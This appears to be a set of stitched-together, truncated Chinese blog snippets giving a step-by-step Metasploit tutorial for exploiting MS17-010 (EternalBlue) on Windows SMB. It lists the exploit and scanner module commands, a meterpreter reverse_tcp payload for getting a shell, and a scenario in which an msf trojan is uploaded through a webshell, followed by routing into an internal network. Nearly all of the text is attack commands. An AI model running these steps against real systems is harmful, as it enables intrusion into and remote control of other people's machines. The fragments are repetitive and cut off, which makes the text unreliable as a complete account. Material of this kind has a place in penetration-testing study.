第一步:use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块) 第二步:set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP) 第三步:exploit(执行攻击) 第四步:攻击完成,并且自动返回一个shell控制台
使用Payload进行攻击: background(转换到后台) 对目标主机进行扫描: use auxiliary/scanner/smb/smb_ms17_010 set rhosts 192.168.1.107 可以看到扫描结果,可以使用ms17010对目标主机进行攻击。 使用攻击模块进行攻击: use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp se...
公网主机操作:生成msf木马并监听1234端口。使用webshell上传并执行生成的shell.exe文件。获取目标机内网192.168.1.106的shell权限。执行路由添加命令,获取当前路由信息,添加新路由至目标网段。使用ms17010漏洞进行攻击,尝试对目标主机发起扫描。应用攻击模块进行攻击尝试,但效果不佳。求助社区,发现原版fb.p...
利用已有 Webshell,上传并执行生成的 shell.exe 文件,成功获取目标机内网 192.168.1.106 的 shell。确定当前路由,添加新路由 192.168.1.0/24 到公网主机,通过该路由访问内网。扫描目标主机,发现可用 ms17010 漏洞进行攻击。尝试使用 msf 攻击模块进行攻击,但失败。在土司论坛求助未找到解决方法,...
使用MS17-010检测工具检测,github自行下载攻击正式开始use exploit/windows/smb/ms17_010_eternalblue(切换到攻击模块) set rhost 192.168.3.38(设置存在445漏洞的PC电脑IP) exploit(执行攻击) 攻击完成,并且会自动返回一个shell控制台__EOF__ 本文作者:浅笑996 本文链接:https://www.cnblogs.com/qianxiao996/p...